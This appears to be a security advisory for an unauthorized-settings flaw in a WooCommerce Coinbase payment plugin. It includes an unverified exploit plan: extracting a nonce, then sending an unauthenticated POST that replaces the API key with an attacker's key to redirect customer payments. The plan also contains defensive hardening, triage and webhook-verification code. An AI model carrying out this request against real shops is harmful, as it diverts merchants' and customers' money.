CVE-2026-25396

Coinbase Commerce – Crypto Gateway for WooCommerce <= 1.6.6 - Missing Authorization

Type: Missing Authorization
Severity: Medium
CVSS Score: 5.3
Patched in: Unpatched
Time to patch: N/A

Description

The Coinbase Commerce – Crypto Gateway for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Technical Details

Affected versions: <= 1.6.6
Published: March 23, 2026
Last updated: March 26, 2026
Research Plan
Unverified

This research plan targets CVE-2026-25396, a missing authorization vulnerability in the Coinbase Commerce plugin for WooCommerce. Since source code is not provided, this plan focuses on identifying the specific vulnerable AJAX or init handler and exploiting it to perform unauthorized configuration changes.


1. Vulnerability Summary

The Coinbase Commerce – Crypto Gateway for WooCommerce plugin (<= 1.6.6) fails to implement proper capability checks (e.g., current_user_can('manage_options')) on at least one function exposed via WordPress hooks. This allows unauthenticated attackers (AV:N/AC:L/PR:N) to trigger internal plugin logic. Given the CVSS of 5.3 (Medium), the "unauthorized action" likely involves modifying plugin settings, resetting connection states, or manipulating non-critical metadata.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php (most likely) or /wp-admin/admin-post.php.
  • Vulnerable Action: Likely a wp_ajax_nopriv_* handler or a function hooked to admin_init that lacks a current_user_can check.
  • Action Names (Inferred):
    • coinbase_commerce_save_settings
    • commerce_coinbase_update_api_key
    • coinbase_commerce_disconnect
    • coinbase_commerce_verify_api_key
  • Payload: A POST request containing a malicious action parameter and configuration values (e.g., api_key, shared_secret).

3. Code Flow (Inferred)

  1. Registration: The plugin registers an action:
    add_action('wp_ajax_nopriv_ACTION_NAME', 'handler_function');
  2. Execution: When admin-ajax.php is called with action=ACTION_NAME, WordPress executes handler_function.
  3. Vulnerability: handler_function performs a sensitive operation (like update_option) without:
    • Verifying the user has manage_woocommerce or manage_options capabilities.
    • Verifying a valid CSRF nonce.
  4. Sink: The input reaches update_option('woocommerce_commerce-coinbase_settings', ...) or similar.
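
The registration-to-sink chain above, as an added illustration (this is not the plugin's code; the page does not identify the real handler, so the action name `coinbase_save_settings`, the `api_key` and `nonce` parameters and the `coinbase-admin` script handle are assumptions, while the option name is the one this plan uses). The first handler has the vulnerable shape described in item 3; the second shows the three controls that close it:

```php
<?php
// Added illustration, not code from the Coinbase Commerce plugin. The action name,
// parameter names and script handle are assumptions; the option name is the plan's.

define( 'EXAMPLE_CC_OPTION', 'woocommerce_commerce-coinbase_settings' );

// ---- Vulnerable shape: reachable when logged out, writes settings with no checks ----
add_action( 'wp_ajax_nopriv_coinbase_save_settings', 'example_vuln_save_settings' );
add_action( 'wp_ajax_coinbase_save_settings',        'example_vuln_save_settings' );

function example_vuln_save_settings() {
    $settings            = (array) get_option( EXAMPLE_CC_OPTION, array() );
    $settings['api_key'] = sanitize_text_field( wp_unslash( $_POST['api_key'] ?? '' ) );
    update_option( EXAMPLE_CC_OPTION, $settings ); // sink: any visitor can repoint the gateway
    wp_send_json_success();                         // 200 with {"success":true}
}

// ---- Hardened shape ----
// 1. Privileged hook only. admin-ajax.php answers "0" to a logged-out caller of an action
//    that has no wp_ajax_nopriv_ registration, so the handler is never entered.
add_action( 'wp_ajax_coinbase_save_settings', 'example_fixed_save_settings' );

function example_fixed_save_settings() {
    // 2. Authorization: the caller must be allowed to manage the shop. Being logged in is
    //    not enough on its own; a subscriber account reaches wp_ajax_ hooks as well.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 ); // exits
    }
    // 3. CSRF: nonce bound to this action and this user; dies with 403 when missing or invalid.
    //    A nonce is not an authorization check, which is why step 2 is still required.
    check_ajax_referer( 'coinbase_save_settings', 'nonce' );

    $api_key = sanitize_text_field( wp_unslash( $_POST['api_key'] ?? '' ) );
    if ( '' === $api_key ) {
        wp_send_json_error( array( 'message' => 'api_key is required' ), 400 );
    }
    $settings            = (array) get_option( EXAMPLE_CC_OPTION, array() );
    $settings['api_key'] = $api_key;
    update_option( EXAMPLE_CC_OPTION, $settings );
    wp_send_json_success();
}

// The nonce the hardened handler expects is issued only on the admin screen that needs it
// (woocommerce_page_wc-settings is the WooCommerce > Settings screen's hook suffix).
add_action( 'admin_enqueue_scripts', function ( $hook_suffix ) {
    if ( 'woocommerce_page_wc-settings' !== $hook_suffix ) {
        return;
    }
    // 'coinbase-admin' is an assumed script handle registered elsewhere by the plugin.
    wp_localize_script( 'coinbase-admin', 'coinbase_commerce_params', array(
        'ajax_url' => admin_url( 'admin-ajax.php' ),
        'nonce'    => wp_create_nonce( 'coinbase_save_settings' ),
    ) );
} );
```

Each control in the hardened handler answers one of the two questions in item 3: `current_user_can` answers who may do this, `check_ajax_referer` answers whether they meant to. Note that the vulnerable handler still sanitizes its input; sanitization is not a mitigation for missing authorization, because a well-formed attacker key is exactly what the sink expects.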

4. Nonce Acquisition Strategy

If the vulnerable handler requires a nonce (even though it misses the capability check), follow this protocol. Keep in mind that a nonce localized for logged-out visitors is generated for user ID 0, so it is valid for any unauthenticated caller for 12 to 24 hours; it gates CSRF only and is not an authorization control.

  1. Identify Script Localization: The plugin likely localizes a nonce via wp_localize_script.
  2. Locate Triggering Page: Coinbase settings usually appear in WooCommerce > Settings > Payments > Coinbase Commerce. However, if the nonce is intended for unauthenticated use (a nopriv action), it may appear on the checkout page or a specific product page.
  3. Shortcode Discovery: Search the plugin source for shortcodes (plain grep; `wp eval` runs PHP, not shell commands):
    grep -rn 'add_shortcode' wp-content/plugins/commerce-coinbase-for-woocommerce/
  4. Create Test Page:
    wp post create --post_type=page --post_status=publish --post_title="Coinbase Test" --post_content="[coinbase_shortcode_found]"
  5. Extract via Browser: open http://localhost:8080/coinbase-test and, in the developer-tools console, read the localized object (the JavaScript variable names are inferred):
    window.coinbase_commerce_params?.nonce || window.coinbase_ajax?.nonce

5. Exploitation Strategy

The goal is to update the plugin's API key to point to an attacker-controlled Coinbase Commerce account, redirecting payments.

Step 1: Discover Vulnerable Action
First identify the vulnerable action name by inspecting the plugin source (this catches string-literal hook names only; interpolated names such as "wp_ajax_nopriv_{$prefix}_save" need a looser pattern):
grep -rnE "wp_ajax_nopriv|admin_post_nopriv" wp-content/plugins/commerce-coinbase-for-woocommerce/

Step 2: Construct the Request
Once the action and parameters are identified (e.g., action=coinbase_save_api and parameter api_key):

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Payload:
    action=IDENTIFIED_ACTION&api_key=ATTACKER_KEY&nonce=EXTRACTED_NONCE
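
Step 1's grep finds registrations but says nothing about whether the callback checks anything, which is the actual question. The script below is an added triage helper (not the plugin's code and not part of the advisory) that does the second half: it resolves each registration that fires for logged-out visitors (wp_ajax_nopriv_*, admin_post_nopriv_*, admin_init) to its callback body and reports whether a capability or nonce function appears in it. Function and constant names prefixed `example_` are this helper's own; the plugin directory is the one the plan names.

```php
<?php
// Added triage helper, not the plugin's code. Usage:
//   php nopriv_triage.php wp-content/plugins/commerce-coinbase-for-woocommerce
// Regex- and brace-counting based (it does not understand strings or comments, and only
// sees string-literal hook names), so a flagged callback is a candidate for manual review,
// not a confirmed finding. Hooking admin_init is not a bug by itself; the verdict is what matters.

const CHECK_FUNCTIONS = array(
    'current_user_can', 'user_can', 'check_ajax_referer', 'check_admin_referer', 'wp_verify_nonce',
);
const UNAUTH_HOOK_RE = '/add_action\(\s*[\'"](wp_ajax_nopriv_\w+|admin_post_nopriv_\w+|admin_init)[\'"]\s*,\s*/';

/** Source of the brace-delimited block starting at the first "{" at or after $from. */
function example_block_at( string $code, int $from ): ?string {
    $open = strpos( $code, '{', $from );
    if ( false === $open ) {
        return null;
    }
    $depth = 0;
    for ( $i = $open, $len = strlen( $code ); $i < $len; $i++ ) {
        if ( '{' === $code[ $i ] ) {
            $depth++;
        } elseif ( '}' === $code[ $i ] && 0 === --$depth ) {
            return substr( $code, $open, $i - $open + 1 );
        }
    }
    return null;
}

/** Body of the callback argument that starts at $offset in $code; named callbacks are searched across all files. */
function example_callback_body( string $code, int $offset, array $sources ): ?string {
    $tail = substr( $code, $offset, 200 );
    if ( preg_match( '/^(?:static\s+)?function\s*\(/', $tail ) ) {
        return example_block_at( $code, $offset ); // closure registered inline
    }
    if ( preg_match( '/^(?:static\s+)?fn\s*\(/', $tail ) ) {
        return $tail;                              // arrow function: single expression, no braces
    }
    // 'fn', array( $this, 'fn' ), [ self::class, 'fn' ], 'Some\Class::fn'
    if ( ! preg_match( '/^(?:array\s*\(|\[)?[^\'"]*[\'"](?:[\w\\\\]+::)?(\w+)[\'"]/', $tail, $m ) ) {
        return null;
    }
    $name = $m[1];
    foreach ( $sources as $src ) {
        // First definition with this name wins; same-named methods in other classes are a known limit.
        if ( preg_match( '/\bfunction\s+' . preg_quote( $name, '/' ) . '\s*\(/', $src, $f, PREG_OFFSET_CAPTURE ) ) {
            return example_block_at( $src, $f[0][1] );
        }
    }
    return null;
}

/** Scan every .php file under $dir; returns rows of [hook, file, verdict]. */
function example_triage( string $dir ): array {
    $sources = array();
    $it      = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $dir, FilesystemIterator::SKIP_DOTS ) );
    foreach ( $it as $file ) {
        if ( 'php' === strtolower( $file->getExtension() ) ) {
            $sources[ $file->getPathname() ] = (string) file_get_contents( $file->getPathname() );
        }
    }
    $rows = array();
    foreach ( $sources as $path => $code ) {
        if ( ! preg_match_all( UNAUTH_HOOK_RE, $code, $hits, PREG_OFFSET_CAPTURE | PREG_SET_ORDER ) ) {
            continue;
        }
        foreach ( $hits as $hit ) {
            $hook   = $hit[1][0];
            $offset = $hit[0][1] + strlen( $hit[0][0] ); // first character of the callback argument
            $body   = example_callback_body( $code, $offset, $sources );
            if ( null === $body ) {
                $verdict = 'callback body not found (review manually)';
            } else {
                $found   = array_filter( CHECK_FUNCTIONS, fn ( $c ) => false !== strpos( $body, $c ) );
                $verdict = $found ? 'checks: ' . implode( ', ', $found ) : 'NO CAPABILITY OR NONCE CHECK';
            }
            $rows[] = array( $hook, basename( $path ), $verdict );
        }
    }
    return $rows;
}

if ( PHP_SAPI === 'cli' ) {
    foreach ( example_triage( $argv[1] ?? '.' ) as $row ) {
        vprintf( "%-45s %-30s %s\n", $row );
    }
}
```

A "NO CAPABILITY OR NONCE CHECK" row on a wp_ajax_nopriv_ hook whose body reaches update_option is the candidate to carry into Step 2; a row that lists only a nonce function is the case section 4 covers, since a nonce without a capability check still leaves the handler open to anyone who can read the localized nonce.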
    

6. Test Data Setup

  1. Install WooCommerce: The plugin requires WooCommerce to be active.
  2. Configure Gateway: Enable "Coinbase Commerce" in WooCommerce payment settings.
  3. API Key Initial State: Set a dummy API key (e.g., ORIGINAL_KEY_12345) via the UI or WP-CLI. The gateway keeps all of its fields in one serialized array, so a JSON update replaces the whole array; either include the other fields (at least "enabled") or patch the single key:
    wp option update woocommerce_commerce-coinbase_settings '{"enabled":"yes","api_key":"ORIGINAL_KEY_12345"}' --format=json
    wp option patch update woocommerce_commerce-coinbase_settings api_key ORIGINAL_KEY_12345

7. Expected Results

  • HTTP Response: A 200 OK response, typically with a body of {"success":true} or 1. Distinguish this from admin-ajax.php's own replies: a bare 0 means no handler is registered for that action for a logged-out caller (so the handler never ran), and -1 with a 403 status means a nonce check rejected the request before the handler's logic executed.
  • State Change: The database option containing the API key is overwritten with the attacker's value.

8. Verification Steps

After sending the exploit request, verify via wp-cli:

# Check if the API key in the options table has changed
wp option get woocommerce_commerce-coinbase_settings --format=json

If the api_key value matches ATTACKER_KEY, the exploitation is successful.

9. Alternative Approaches

If no wp_ajax_nopriv actions are found, check for:

  1. admin_init hooks:
    grep -rn "add_action.*admin_init" wp-content/plugins/commerce-coinbase-for-woocommerce/
    Verify whether these handlers check current_user_can. admin_init fires for every request to /wp-admin/admin-ajax.php and /wp-admin/admin-post.php, including requests from unauthenticated users, so a settings write inside an admin_init callback is reachable without a wp_ajax_nopriv_ registration at all.
  2. REST routes:
    Check register_rest_route calls for a missing permission_callback or one that always returns true (__return_true); WordPress 5.5 and later logs a notice when it is absent but still serves the route. The core /wp/v2/settings endpoint that register_setting(..., ['show_in_rest' => true]) feeds is itself gated on manage_options, so register_setting alone is not the exposure; a custom route is.
  3. Webhook Handler:
    Check whether the webhook endpoint (inferred: /wc-api/coinbase_commerce/, i.e. a woocommerce_api_* hook) updates order status without first validating the X-CC-Webhook-Signature header, which Coinbase Commerce computes as an HMAC-SHA256 of the raw request body keyed with the webhook shared secret. A handler that accepts unsigned events lets anyone mark orders as paid.
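
The check item 3 asks for, written out as an added example (not the plugin's code; the endpoint name `coinbase_commerce`, the `webhook_secret` settings key and the use of the charge's metadata to carry the WooCommerce order id are assumptions, while the signature scheme is the one Coinbase Commerce documents). The ordering is the point: nothing in the body is parsed or acted on until the MAC has been verified, and an unconfigured secret fails closed instead of skipping verification:

```php
<?php
// Added example, not the plugin's code. Assumed: the endpoint name 'coinbase_commerce'
// (giving /wc-api/coinbase_commerce/), the 'webhook_secret' settings key, and that the plugin
// stores the WooCommerce order id in the charge's metadata. The signature scheme is the one
// Coinbase Commerce documents: hex HMAC-SHA256 of the raw body sent in X-CC-Webhook-Signature.

function example_cc_signature_valid( string $raw_body, string $header_sig, string $secret ): bool {
    // Fail closed: an unconfigured secret or a missing header rejects; it never skips the check.
    if ( '' === $secret || '' === $header_sig ) {
        return false;
    }
    $expected = hash_hmac( 'sha256', $raw_body, $secret );
    return hash_equals( $expected, strtolower( trim( $header_sig ) ) ); // constant-time compare
}

function example_cc_webhook() {
    $settings = (array) get_option( 'woocommerce_commerce-coinbase_settings', array() );
    $secret   = (string) ( $settings['webhook_secret'] ?? '' );
    $raw_body = (string) file_get_contents( 'php://input' ); // MAC the bytes as sent, not a re-encoding
    $sig      = (string) ( $_SERVER['HTTP_X_CC_WEBHOOK_SIGNATURE'] ?? '' );

    // Verify before parsing. A handler that reads event.type first, or that skips this branch
    // when the secret is empty, is the weakness item 3 above asks you to look for.
    if ( ! example_cc_signature_valid( $raw_body, $sig, $secret ) ) {
        status_header( 401 );
        exit;
    }

    $event    = json_decode( $raw_body, true );
    $type     = (string) ( $event['event']['type'] ?? '' );
    $order_id = absint( $event['event']['data']['metadata']['order_id'] ?? 0 );
    $order    = $order_id ? wc_get_order( $order_id ) : false;
    if ( ! $order ) {
        status_header( 400 );
        exit;
    }

    // Only an authenticated event moves the order; the charge code becomes the transaction id.
    if ( 'charge:confirmed' === $type ) {
        $order->payment_complete( (string) ( $event['event']['data']['code'] ?? '' ) );
    } elseif ( 'charge:failed' === $type ) {
        $order->update_status( 'failed', 'Coinbase Commerce reported the charge as failed.' );
    }
    status_header( 200 );
    exit;
}

if ( function_exists( 'add_action' ) ) {
    add_action( 'woocommerce_api_coinbase_commerce', 'example_cc_webhook' );
} else {
    // Outside WordPress (php cli): exercise the verifier with a constructed, non-real event.
    $secret = 'example-shared-secret';
    $body   = '{"event":{"type":"charge:confirmed","data":{"code":"ABCD1234","metadata":{"order_id":"42"}}}}';
    $good   = hash_hmac( 'sha256', $body, $secret );
    var_dump( example_cc_signature_valid( $body, $good, $secret ) );
    var_dump( example_cc_signature_valid( str_replace( '"42"', '"43"', $body ), $good, $secret ) );
    var_dump( example_cc_signature_valid( $body, $good, '' ) );
}
```

Run from the command line the three var_dump calls print true, then false for the body with the order id tampered, then false for the empty secret. When auditing the real handler, compare it against these three outcomes: a forged body, a valid body with a missing header, and a store where the secret was never configured should all be rejected before any WooCommerce order object is loaded.
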
Research Findings
Static analysis — not yet PoC-verified

Summary

The Coinbase Commerce – Crypto Gateway for WooCommerce plugin for WordPress is vulnerable to unauthorized access in versions up to 1.6.6 due to missing capability checks on functions hooked to administrative initialization or AJAX handlers. This allows unauthenticated attackers to modify plugin settings, such as the API key, potentially redirecting customer payments to an attacker-controlled account.

Exploit Outline

The exploit targets administrative handlers (likely hooked to admin_init or wp_ajax_nopriv) that perform sensitive operations without checking user permissions or verifying nonces. An attacker sends an unauthenticated POST request to /wp-admin/admin-ajax.php or a similar admin endpoint containing parameters to update the 'woocommerce_commerce-coinbase_settings' option. By providing a malicious 'api_key', the attacker can intercept future cryptocurrency payments made through the store.
